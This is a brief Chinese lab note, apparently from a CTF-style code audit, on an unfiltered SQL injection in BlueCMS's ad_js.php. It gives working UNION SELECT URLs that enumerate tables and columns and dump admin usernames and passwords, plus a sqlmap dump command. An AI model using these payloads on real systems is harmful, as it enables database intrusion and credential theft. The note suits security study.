发现有sql查询语句,由get接受参数,然后没有过滤,也没有污点函数。
view-source:http://www.bluecms.com:8047/ad_js.php?ad_id=1%20UNION%20SELECT%201,2,3,4,5,6,%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#
也可以用sqlmap梭哈,毕竟没过滤
python sqlmap.py -r CtfSqlmap.txt -D bluecms -T admin --dump
xi
view-source:http://www.bluecms.com:8047/ad_js.php?ad_id=1%20UNION%20SELECT%201,2,3,4,5,6,GROUP_CONCAT(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema=0x626C7565636D73%20AND%20table_name=0x61646D696E#(发现单引号被转义了,只能用十六进制转换了)
view-source:http://www.bluecms.com:8047/ad_js.php?ad_id=1%20UNION%20SELECT%201,2,3,4,5,6,GROUP_CONCAT(admin_name,pwd)%20FROM%20%20admin#